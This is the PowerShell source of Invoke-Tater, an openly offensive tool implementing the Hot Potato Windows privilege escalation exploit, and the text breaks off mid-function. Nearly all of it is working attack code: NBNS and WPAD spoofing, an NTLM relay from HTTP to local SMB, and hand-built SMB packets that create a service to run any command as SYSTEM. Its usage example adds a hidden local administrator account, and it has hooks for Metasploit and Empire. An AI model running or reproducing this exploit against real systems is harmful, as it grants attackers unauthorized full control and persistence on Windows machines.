function Invoke-Tater { <# .SYNOPSIS Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec. .DESCRIPTION Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation with functionality similiar to Potato.exe available at https://github.com/foxglovesec/Potato. .PARAMETER IP Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used. .PARAMETER SpooferIP Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target. .PARAMETER Command Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary. .PARAMETER NBNS Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing. .PARAMETER NBNSLimit Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly. .PARAMETER ExhaustUDP Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution. .PARAMETER HTTPPort Default = 80: Specify a TCP port for the HTTP listener and redirect response. .PARAMETER Hostname Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008. .PARAMETER WPADDirectHosts Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as direct. .PARAMETER WPADPort Default = 80: Specify a proxy server port to be included in a the wpad.dat file. .PARAMETER Trigger Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task .PARAMETER TaskDelete Default = Tater: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs. .PARAMETER Taskname Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname. .PARAMETER RunTime (Integer) Set the run time duration in minutes. .PARAMETER ConsoleOutput Default = Enabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER StatusOutput Default = Enabled: (Y/N) Enable/Disable startup status messages. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER Tool Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire .EXAMPLE Invoke-Tater -Command "net user Tater Spring2016 /add && net localgroup administrators Tater /add" .LINK https://github.com/Kevin-Robertson/Tater #> # Default parameter values can be modified in this section [CmdletBinding()] param ( [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSLimit="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ExhaustUDP="N", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$TaskDelete="Y", [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$IP="", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$SpooferIP="127.0.0.1", [parameter(Mandatory=$false)][Int]$HTTPPort="80", [parameter(Mandatory=$false)][Int]$RunTime="", [parameter(Mandatory=$false)][ValidateSet(0,1,2)][Int]$Trigger="1", [parameter(Mandatory=$true)][String]$Command="", [parameter(Mandatory=$false)][String]$Hostname="WPAD", [parameter(Mandatory=$false)][String]$Taskname="Tater", [parameter(Mandatory=$false)][String]$WPADPort="80", [parameter(Mandatory=$false)][Array]$WPADDirectHosts, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if ($invalid_parameter) { throw "$($invalid_parameter) is not a valid parameter." } if(!$IP) { $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) } if(!$Command) { throw "You must specify an -Command if enabling -SMBRelay" } if($tater.running) { throw "Invoke-Tater is already running, use Stop-Tater" } $global:tater = [HashTable]::Synchronized(@{}) $tater.running = $true $tater.console_queue = New-Object System.Collections.ArrayList $tater.status_queue = New-Object System.Collections.ArrayList $tater.console_input = $true $tater.SMB_relay_active_step = 0 $tater.trigger = $Trigger if($StatusOutput -eq 'Y') { $tater.status_output = $true } else { $tater.status_output = $false } if($Tool -eq 1) # Metasploit Interactive Powershell { $tater.tool = 1 $tater.newline = "" $ConsoleOutput = "N" } elseif($Tool -eq 2) # PowerShell Empire { $tater.tool = 2 $tater.console_input = $false $tater.newline = "`n" $ConsoleOutput = "Y" $ShowHelp = "N" } else { $tater.tool = 0 $tater.newline = "" } if($Trigger -eq 2) { $NBNS = 'N' } # Write startup messages $tater.status_queue.Add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started") > $null $tater.status_queue.Add("Local IP Address = $IP") > $null if($HTTPPort -ne 80) { $tater.status_queue.Add("HTTP Port = $HTTPPort") > $null } if($NBNS -eq 'Y') { $tater.status_queue.Add("Spoofing Hostname = $Hostname") > $null if($NBNSLimit -eq 'N') { $tater.status_queue.Add("NBNS Bruteforce Spoofer Limiting Disabled") > $null } } else { $tater.status_queue.Add("NBNS Bruteforce Spoofing Disabled") > $null } if($SpooferIP -ne '127.0.0.1') { $tater.status_queue.Add("NBNS Spoofer IP Address = $SpooferIP") > $null } if($WPADDirectHosts.Count -gt 0) { $tater.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null } if($WPADPort -ne 80) { $tater.status_queue.Add("WPAD Port = $WPADPort") > $null } if($ExhaustUDP -eq 'Y') { $tater.status_queue.Add("UDP Port Exhaustion Enabled") > $null } if($Trigger -eq 0) { $tater.status_queue.Add("Relay Trigger Disabled") > $null } elseif($Trigger -eq 1) { $tater.status_queue.Add("Windows Defender Trigger Enabled") > $null } elseif($Trigger -eq 2) { $tater.status_queue.Add("Scheduled Task Trigger Enabled") > $null $tater.taskname = $Taskname -replace " ","_" if($TaskDelete -eq 'Y') { $tater.status_queue.Add("Scheduled Task Prefix = $Taskname") > $null $tater.status_queue.Add("Scheduled Task Deletion Enabled") > $null $tater.task_delete = $true } else { $tater.status_queue.Add("Scheduled Task = $Taskname") > $null $tater.status_queue.Add("Scheduled Task Deletion Disabled") > $null $tater.task_delete = $false } } if($ConsoleOutput -eq 'Y') { $tater.status_queue.Add("Real Time Console Output Enabled") > $null $tater.console_output = $true } else { if($tater.tool -eq 1) { $tater.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null } else { $tater.status_queue.Add("Real Time Console Output Disabled") > $null } } if($RunTime -eq '1') { $tater.status_queue.Add("Run Time = $RunTime Minute") > $null } elseif($RunTime -gt 1) { $tater.status_queue.Add("Run Time = $RunTime Minutes") > $null } if($ShowHelp -eq 'Y') { $tater.status_queue.Add("Run Stop-Tater to stop Tater early") > $null if($tater.console_output) { $tater.status_queue.Add("Use Get-Command -Noun Tater* to show available functions") > $null $tater.status_queue.Add("Press any key to stop real time console output") > $null $tater.status_queue.Add("") > $null } } if($tater.status_output) { while($tater.status_queue.Count -gt 0) { write-output($tater.status_queue[0] + $tater.newline) $tater.status_queue.RemoveRange(0,1) } } $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) $process_ID = $process_ID -replace "-00-00","" [Byte[]] $tater.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} # Begin ScriptBlocks # Shared Basic Functions ScriptBlock $shared_basic_functions_scriptblock = { function DataLength { param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) return $string_length } function DataToString { param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start + $string2_length + $string3_length)..($string_start + $string_length + $string2_length + $string3_length - 1)]) $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = New-Object System.String ($string_data,0,$string_data.Length) return $string_extract } function DnsFlushResolverCache { $DNS_member_definition = @' [DllImport("dnsapi.dll", EntryPoint="DnsFlushResolverCache")] private static extern UInt32 DnsFlushResolverCache(); public static void FlushResolverCache() { UInt32 result = DnsFlushResolverCache(); } '@ Add-Type -MemberDefinition $DNS_member_definition -Namespace DNSAPI -Name Flush -UsingNamespace System.Collections,System.ComponentModel [DNSAPI.Flush]::FlushResolverCache() } function StopTater { $tater.console_queue.Add("$(Get-Date -format 's') - Stopping HTTP listener") $tater.HTTP_client.Close() start-sleep -s 1 $tater.HTTP_listener.server.blocking = $false Start-Sleep -s 1 $tater.HTTP_listener.server.Close() Start-Sleep -s 1 $tater.HTTP_listener.Stop() if($tater.SMBRelay_success) { if($tater.trigger -eq 2) { if($tater.task_delete -and $tater.task_added) { $scheduled_task_deleted = $false $schedule_service = new-object -com("Schedule.Service") $schedule_service.Connect() $scheduled_task_folder = $schedule_service.GetFolder("\") $scheduled_task_list = $scheduled_task_folder.GetTasks(1) foreach($scheduled_task in $scheduled_task_list) { if($scheduled_task.name -eq $tater.task) { $scheduled_task_folder.DeleteTask($scheduled_task.name,0) } } foreach($scheduled_task in $scheduled_task_list) { if($scheduled_task.name -eq $tater.task) { $scheduled_task_deleted = $true } } if($scheduled_task_deleted) { $tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully") } else { $tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually") } } elseif($tater.task_added) { $tater.console_queue.Add("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished") } } $tater.console_queue.Add("$(Get-Date -format 's') - Tater was successful and has exited") } else { $tater.console_queue.Add("$(Get-Date -format 's') - Tater was not successful and has exited") } Start-Sleep -s 1 $tater.running = $false } } # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response $SMB_NTLM_functions_scriptblock = { function SMBNTLMChallenge { param ([Byte[]]$payload_bytes) $payload = [System.BitConverter]::ToString($payload_bytes) $payload = $payload -replace "-","" $NTLM_index = $payload.IndexOf("4E544C4D53535000") if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") { $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) } return $NTLM_challenge } } # SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target $SMB_relay_challenge_scriptblock = { function SMBRelayChallenge { param ($SMB_relay_socket,$HTTP_request_bytes) if ($SMB_relay_socket) { $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream() } $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024 $i = 0 :SMB_relay_challenge_loop while ($i -lt 2) { switch ($i) { 0 { $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00, 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0xff,0xff + $tater.process_ID_bytes + 0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d, 0x20,0x30,0x2e,0x31,0x32,0x00 } 1 { $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length)) $SMB_blob_length = $SMB_blob_length -replace "-00-00","" $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28)) $SMB_byte_count = $SMB_byte_count -replace "-00-00","" $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 87)) $SMB_netbios_length = $SMB_netbios_length -replace "-00-00","" $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} [Array]::Reverse($SMB_netbios_length) $SMB_relay_challenge_send = 0x00,0x00 + $SMB_netbios_length + 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + $tater.process_ID_bytes + 0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00, 0x01,0x00,0x00,0x00,0x00,0x00 + $SMB_blob_length + 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + $SMB_byte_count + $HTTP_request_bytes + 0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73, 0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00, 0x00,0x00 } } $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length) $SMB_relay_challenge_stream.Flush() $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length) $i++ } return $SMB_relay_challenge_bytes } } # SMB Relay Response ScriptBlock - sends NTLM reponse to relay target $SMB_relay_response_scriptblock = { function SMBRelayResponse { param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID) $SMB_relay_response_bytes = New-Object System.Byte[] 1024 if ($SMB_relay_socket) { $SMB_relay_response_stream = $SMB_relay_socket.GetStream() } $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length)) $SMB_blob_length = $SMB_blob_length -replace "-00-00","" $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28)) $SMB_byte_count = $SMB_byte_count -replace "-00-00","" $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 88)) $SMB_netbios_length = $SMB_netbios_length -replace "-00-00","" $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} [Array]::Reverse($SMB_netbios_length) $j = 0 :SMB_relay_response_loop while ($j -lt 1) { $SMB_relay_response_send = 0x00,0x00 + $SMB_netbios_length + 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + $tater.process_ID_bytes + $SMB_user_ID + 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00, 0x00,0x00,0x00 + $SMB_blob_length + 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + $SMB_byte_count + $HTTP_request_bytes + 0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73, 0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00, 0x00 $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length) $SMB_relay_response_stream.Flush() $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length) $tater.SMB_relay_active_step = 2 $j++ } return $SMB_relay_response_bytes } } # SMB Relay Execute ScriptBlock - executes command within authenticated SMB session $SMB_relay_execute_scriptblock = { function SMBRelayExecute { param ($SMB_relay_socket,$SMB_user_ID) if ($SMB_relay_socket) { $SMB_relay_execute_stream = $SMB_relay_socket.GetStream() } $SMB_relay_failed = $false $SMB_relay_execute_bytes = New-Object System.Byte[] 1024 $SMB_service_random = [String]::Join("00-", (1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)})) $SMB_service = $SMB_service_random -replace "-00","" $SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1) $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length) $SMB_service_random += '00-00-00' [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $Command = "%COMSPEC% /C `"" + $Command + "`"" [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{ $SMB_relay_command += "{0:X2}-00-" -f $_ } if([Bool]($Command.Length % 2)) { $SMB_relay_command += '00-00' } else { $SMB_relay_command += '00-00-00-00' } [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237) $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0] $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174) $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1] $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2) $k = 0 :SMB_relay_execute_loop while ($k -lt 12) { switch ($k) { 0 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00, 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0xff,0xff + $tater.process_ID_bytes + $SMB_user_ID + 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 } 1 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00, 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 } 2 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, 0x00 $SMB_multiplex_id = 0x05 } 3 { $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest } 4 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + $SMB_service_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 $SMB_multiplex_id = 0x07 } 5 { $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest } 6 { $SMB_relay_execute_send = [Array]0x00 + $SMB_service_data_length_bytes + 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0x08,0x00 + $SMB_service_byte_count_bytes + 0x00,0x00 + $SMB_service_byte_count_bytes + 0x3f,0x00,0x00,0x00,0x00,0x00 + $SMB_service_byte_count_bytes + 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + $SMB_service_byte_count_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, 0x00 + $SMB_context_handler + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + $SMB_service_bytes + 0x00,0x00 + $SMB_referent_ID_bytes + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + $SMB_service_bytes + 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, 0x00,0x00,0x00,0x00,0x00 + $SMB_relay_command_length_bytes + 0x00,0x00,0x00,0x00 + $SMB_relay_command_length_bytes + $SMB_relay_command_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00 $SMB_multiplex_id = 0x09 } 7 { $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest } 8 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, 0x00,0x00,0x00,0x13,0x00 + $SMB_context_handler + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 } 9 { $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest } 10 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, 0x00,0x00,0x00,0x02,0x00 + $SMB_context_handler } 11 { $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest } } $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length) $SMB_relay_execute_stream.Flush() if ($k -eq 5) { $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) $SMB_context_handler = $SMB_relay_execute_bytes[88..107] if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')) { #$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget") } elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00') { $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is not a local administrator on " + "$SMBRelayTarget") $SMB_relay_failed = $true } else { $SMB_relay_failed = $true } } elseif ($k -eq 7 -or $k -eq 9 -or $k -eq 11) { $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) switch($k) { 7 { $SMB_context_handler = $SMB_relay_execute_bytes[92..111] $SMB_relay_execute_error_message = "Service creation fault context mismatch" } 11 { $SMB_relay_execute_error_message = "Service start fault context mismatch" } 13 { $SMB_relay_execute_error_message = "Service deletion fault context mismatch" } } if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00') { $SMB_relay_failed = $true } if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c') { $tater.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget") $SMB_relay_failed = $true } } else { $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length) } if(!$SMB_relay_failed -and $k -eq 7) { $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget") } elseif(!$SMB_relay_failed -and $k -eq 9) { $tater.console_queue.Add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget") } elseif(!$SMB_relay_failed -and $k -eq 11) { $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget") } $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00, 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x08 + $tater.process_ID_bytes + $SMB_user_ID + $SMB_multiplex_ID + 0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58, 0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00 if($SMB_relay_failed) { $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget") BREAK SMB_relay_execute_loop } $k++ } $tater.SMB_relay_active_step = 0 $SMB_relay_socket.Close() if(!$SMB_relay_failed) { $tater.SMBRelay_success = $True } } } # HTTP Server ScriptBlock - HTTP listener $HTTP_scriptblock = { param ($Command,$HTTPPort,$WPADDirectHosts,$WPADPort) function NTLMChallengeBase64 { $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, 0x00,0x00,0x00,0x05,0xc2,0x89,0xa2 + $HTTP_challenge_bytes + 